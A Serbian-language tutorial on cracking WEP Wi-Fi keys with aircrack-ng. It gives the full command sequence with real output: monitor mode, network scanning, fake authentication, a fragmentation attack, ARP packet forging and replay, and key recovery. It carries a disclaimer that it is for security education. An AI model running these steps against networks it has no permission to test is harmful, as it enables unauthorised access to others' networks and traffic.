WEP cracking
NAPOMENA!!!
Ovo upustvo napisano je radi boljeg razumevanja kao i poboljšanja sigurnosti bežičnih mreža i nikako nije upustvo koje treba da služi za upadanje i razbijanje tuđih mreža. Svaki upad na tuđu mrežu i računar bez odobrenja njegovog vlasnika je kažnjivo po zakonu!!!
ARP request replay attack je metoda koja će biti opisana u ovom upustvu. Klasični napad ARP zahtevom repodukcije (ARP request replay attack) je najefikasniji način da se stvaraju novi inicijalini vektori (Initialization Vectors - IVs) da bi se pomoću njih moglo doći do WEP ključa. Ova metoda je brza, veoma efikasna i jednostavna. Program sluša za ARP paket i tada ga reemituje natrag do pristupne tačke ili ti AP-a. Ovim načinom pristupna tačka šalje novi ARP paket sa novim IV-om. Svaki put kad program pošalje isti ARP paket, pristupna tačka odgovara sa novim IV-om. Na ovaj način možemo za kratko vreme da sakupimo dovoljno IV paketa i da razbijemo WEP ključ. Pomoću ove metode nije potrebno da na pristupnoj tački bude klinenata niti bilo kakvog protoka.
Za ovu malu "demonstarciju sile" potreban nam je je aircrack-ng paket instaliran na laptopu kao i uporedo otvorena tri xterm-a.
Prvo i osnovno je pre nego što bilo šta počnemo da radimo je da "isključimo" karticu, da bi je mogli ubaciti u takozvani monitor mod.
blackpearl WEP # ifconfig wlan0 down
Ubacivanje wlan0 kartice u monitor mod.
blackpearl WEP # iwconfig wlan0 mode monitor
Ponovno uključivanje wlan0 kartice u rad.
blackpearl WEP # ifconfig wlan0 up
U prvom xterm-u startujemo airodump da vidimo kakvih paketa ima u vazduhu.
blackpearl WEP # airodump-ng wlan0
Izlaz komande (xterm 1):
CH 3 ][ Elapsed: 12 s ][ 2009-05-22 18:06 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:0F:35:5C:22:92 -83 9 0 0 11 54 . WPA TKIP PSK peglus 00:13:01:3E:3B:9F -79 12 0 0 6 54 . WEP WEP MikloNet 00:15:09:14:55:C3 -77 33 373 21 6 54 . OPN Inlog 00:00:0E:BC:F8:7B -46 33 5 0 1 54e WPA2 CCMP PSK Doniluma 00:12:17:4B:34:19 -55 41 0 0 11 54 . WEP WEP linksys 00:0B:2B:20:2F:14 -58 95 0 0 6 54 . WEP WEP pfsense BSSID STATION PWR Rate Lost Packets Probes 00:15:09:14:55:C3 00:19:99:10:AE:93 -86 1 - 1 388 373 00:00:0E:BC:F8:7B 00:0D:02:33:6E:BD -1 1 - 0 0 1 00:00:0E:BC:F8:7B 00:22:FC:50:7E:A5 -51 54e- 1 3 4
U prvom redu izlaza vidimo informacije o kanalu (CH <1-14> ), zatim vreme koje je airodump-ng uključen kao i datum i aktuelno vreme. Posle toga dolazi tabela sa pronadjenim AP-ima kao i sve o njima a zatim i klijneti koju su trenutno zakačeni na AP-je. Pojedini vrednosti u tabeli su:
- BSSID = Mac adresa AP-a
- PWR = Jačina signala
- RXQ = RXQ je promenjiva od airdump programa, njena maksimalna vrednost je 100
- Beacons = Na osnovu beacons paketa može se ustanoviti da li je signal dobar ili loš. Ako je brojač spor i ima pauze onda je signal preslab.
- #Data = Broj uhvaćenih i memorisanih paketa (samim tim i IV)
- #/s = Broj paketa u sekundi
- CH = Kanal WLAN mreže
- MB = Brzina Wlan mreže (u MBit-ima)
- ENC = Enkripcija
- Cipher = Ime algoritma koji se koristi za šifrovanje i dešifrovanje
- Auth = Autentifikacija
- ESSID = Ime AP-a, na primer linksys
Pošto smo izabrali metu AP cije je ime linksys, čija mac adresa je 00:12:17:4B:34:19 i koje salje signal na kanalu 11. Startovacemo airdump-ng da samo sluša na kanalu 11 i da samo sakuplja pakete sa ove mac adrese. Ova naredba je odrađena u prvom xterm-u i ona ostaje upaljena sve vreme.
blackpearl WEP # airodump-ng -c 11 -w linksys --bssid 00:12:17:4B:34:19 wlan0
Gde je:
-
-c <channel> slušati samo na ovom kanalu ( ovom slučaju kanal 11 )
-
-w <file> opcija za ime fajla u kome će sakupljeni paketi biti memorisani
-
--bssid <MAC> sukpljati pakete samo sa ove mac adrese (Mac adresa napadnutog AP-a)
-
wlan0 ime iterfejsa mrežne kartice
Izlaz komande (xterm 1):
CH 11 ][ Elapsed: 8 s ][ 2009-05-22 18:11 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:17:4B:34:19 -38 78 60 0 0 11 54 . WEP WEP linksys BSSID STATION PWR Rate Lost Packets Probes
Kao što se iz izlaza ove komande može videti na AP-u nema nikoga kao i da nema nikakvog protoka. Zbog toga ćemo da laziramo identifikaciju.
blackpearl WEP # aireplay-ng -1 0 -e linksys -a 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F wlan0
Gde je:
-
-1 opcija za lažiranje autentifikacije (fake authentication)
-
0 reasocijacija vremena u sekundama (reassociation timing in seconds)
-
-e <essid> je ime wireless mreže AP-a koga napadamo
-
-a <MAC> mac adresa AP-a
-
-h <MAC> mac adresa laptop wireless kartice
-
wlan0 ime iterfejsa mrežne kartice
Izlaz komande (xterm 2):
blackpearl WEP # aireplay-ng -1 0 -e linksys -a 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F wlan0 16:55:50 Waiting for beacon frame (BSSID: 00:12:17:4B:34:19) on channel 11 16:55:50 Sending Authentication Request (Open System) [ACK] 16:55:50 Authentication successful 16:55:50 Sending Association Request [ACK] 16:55:51 Association successful :-) (AID: 1) blackpearl WEP #
Poslalil smo zahtev za prijavu autetifikacije i dobili ga.
Izlaz komande (xterm 1):
CH 11 ][ Elapsed: 8 s ][ 2009-05-22 18:11 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:17:4B:34:19 -38 78 60 0 0 11 54 . WEP WEP linksys BSSID STATION PWR Rate Lost Packets Probes 00:12:17:4B:34:19 00:19:D2:85:0D:6F 0 1 - 0 0 6
Pogledom na prvi xterm videćemo da se pojavio klijent na AP i da je zahtev za authentifikaciju prošao.
blackpearl WEP # aireplay-ng -5 -b 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F wlan0
Gde je:
-
-5 napad pomoću fragmentiranog paketa ( fragmentation attack )
-
-b <MAC> mac adresa AP-a
-
-h <MAC> mac adresa wireless kartice laptopa
-
wlan0 ime iterfejsa mrežne kartice
Izlaz komande (xterm 2):
blackpearl WEP # aireplay-ng -5 -b 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F wlan0 16:56:13 Waiting for beacon frame (BSSID: 00:12:17:4B:34:19) on channel 11 16:56:13 Waiting for a data packet... Read 71 packets... Size: 349, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:12:17:4B:34:19 Dest. MAC = 01:00:5E:7F:FF:FA Source MAC = 00:12:17:4B:2C:67 0x0000: 0842 0000 0100 5e7f fffa 0012 174b 3419 .B....^.....K4. 0x0010: 0012 174b 2c67 303e a000 0000 3bb0 fe47 ...K,g0>....;..G 0x0020: f758 c825 7faa acfe aac6 dbe2 f38b 0c41 .X.%..........A 0x0030: 2e79 6f41 5965 d94d 8e82 0480 a219 d984 .yoAYe.M........ 0x0040: e834 4058 84c4 3024 7e91 8da3 6c8a 27e1 .4@X..0$~...l.'. 0x0050: 3e75 2a45 3cef 970a 57d7 1ad8 3fb8 631c >u*E<...W...?.c. 0x0060: 4758 d285 d982 4f95 8c8b 0bb7 ee83 423f GX....O.......B? 0x0070: 9207 7a9f ce5f 55de d1ab 0a8c 196b ab34 ..z.._U......k.4 0x0080: c4c6 130d 558a d274 415d d39f 45b7 ea35 ....U..tA]..E..5 0x0090: 5c5f 6bd6 158e 237a c240 5b89 69eb df23 \_k...#z.@[.i..# 0x00a0: 0ede 6368 9a30 e16b 8904 e91b 730e d010 ..ch.0.k....s... 0x00b0: 058a e8ad 7478 5f0b 8fae 09b1 4923 090e ....tx_.....I#.. 0x00c0: a8dd 051d 04b1 ef80 1ce2 01a5 634e 0b8d ............cN.. 0x00d0: eb90 aff8 7739 3006 113a d63b 8fed bc3f ....w90..:.;...? --- CUT --- Use this packet ?
Odgovoriti sa y (yes). Posle toga dobijamo sledeće:
Saving chosen packet in replay_src-0522-165618.cap 16:56:23 Data packet found! 16:56:23 Sending fragmented packet 16:56:23 Got RELAYED packet!! 16:56:23 Trying to get 384 bytes of a keystream 16:56:24 Got RELAYED packet!! 16:56:24 Trying to get 1500 bytes of a keystream 16:56:24 Got RELAYED packet!! Saving keystream in fragment-0522-165624.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream blackpearl WEP #
blackpearl WEP # packetforge-ng -0 -a 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F -k 255.255.255.255 -l 255.255.255.255 -y fragment-0522-165624.xor -w arp-request
Gde je:
-
-0 indicates you want a arp request packet generated
-
-a <MAC> mac adresa AP-a
-
-h <MAC> mac adresa wireless kartice laptopa
- -k <ip[:port]> : set Destination IP [Port]
- -l <ip[:port]> : set Source IP [Port] (Dash lowercase letter L)
- -y <file> : read PRGA from this file
- -w <file> : write packet to this pcap file
Izlaz komande (xterm 2):
blackpearl WEP # packetforge-ng -0 -a 00:12:17:4B:34:19 -h 00-19-D2-85-0D-6F -k 255.255.255.255 -l 255.255.255.255 -y fragment-0522-165624.xor -w arp-request Wrote packet to: arp-request blackpearl WEP #
blackpearl WEP # aireplay-ng -2 -r arp-request wlan0
Gde je:
-
-2 interaktivna selekcija frejma (interactive frame selection)
-
-r arp-request je ime fajla u kome se nalazi poslednji uspešni ARP replay
-
wlan0 ime iterfejsa mrežne kartice
Izlaz komande (xterm 2):
blackpearl WEP # aireplay-ng -2 -r arp-request wlan0 No source MAC (-h) specified. Using the device MAC (00:19:D2:85:0D:6F) Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:12:17:4B:34:19 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:19:D2:85:0D:6F 0x0000: 0841 0201 0012 174b 3419 0019 d285 0d6f .A.....K4......o 0x0010: ffff ffff ffff 8001 ac00 0000 1609 c02f .............../ 0x0020: f200 d6f3 f5e6 8b78 8794 24bd ab9e 714c .......x..$...qL 0x0030: 61f3 05ea f074 b584 8cb8 f5ae c917 92e2 a....t.......... 0x0040: 014d 0c1e .M.. Use this packet ? y Saving chosen packet in replay_src-0522-165713.cap You should also start airodump-ng to capture replies. Send 41325 packets...(500 pps)
blackpearl WEP # aircrack-ng linksys-02.cap
Izlaz komande (xterm 3):
Aircrack-ng 1.0 rc3 [00:00:01] Tested 468092 keys (got 39942 IVs) KB depth byte(vote) 0 0/ 1 0E(55552) A7(50944) 76(50176) 74(47104) F4(47104) 1 0/ 9 FA(50176) C6(47872) A5(47616) 6E(47360) 38(47104) 2 0/ 1 9A(55808) 9F(49408) 45(47616) E1(47360) 42(46848) 3 0/ 1 1A(55808) 0D(49664) 3C(47872) B0(47872) 57(47104) 4 0/ 1 83(61952) C1(51456) CE(49920) 1A(48640) D6(48384) 5 0/ 1 F5(56064) D9(48640) 21(47360) FE(46848) 26(46336) 6 6/ 9 81(46592) 6E(46336) A8(46336) F1(46336) 3E(46080) 7 0/ 3 11(52736) EF(50432) 7E(49920) B2(48128) B8(47360) 8 2/ 3 2C(48896) 7D(47872) F6(47872) AA(47616) 5C(46336) 9 2/ 16 83(47872) 8A(47616) E6(47616) 23(47360) 28(46848) 10 0/ 5 0B(50944) 6D(48128) 0F(47872) 26(47872) 69(47616) 11 0/ 3 2E(50432) 51(47616) 23(47104) A0(46592) 07(46080) 12 0/ 3 3E(51968) 7F(50432) 05(49152) 69(46848) CB(46848) KEY FOUND! [ 0E:FA:9A:1A:83:F5:74:11:2C:83:0B:2E:3E ] Decrypted correctly: 100% blackpearl WEP #
Zaključak
Za samo 11 minuta aircrack-ng uspeo je da pronađe 128bitni ključ (wep ključ 104bit + 24bit IV) bez da je bilo ikakvog protoka na AP-u i mac filtera.
Sva potrebna dokumentacija nalazi se na aircrack-ng strani. Odličan video tutorial pogledajte ovde.
Artikelaktionen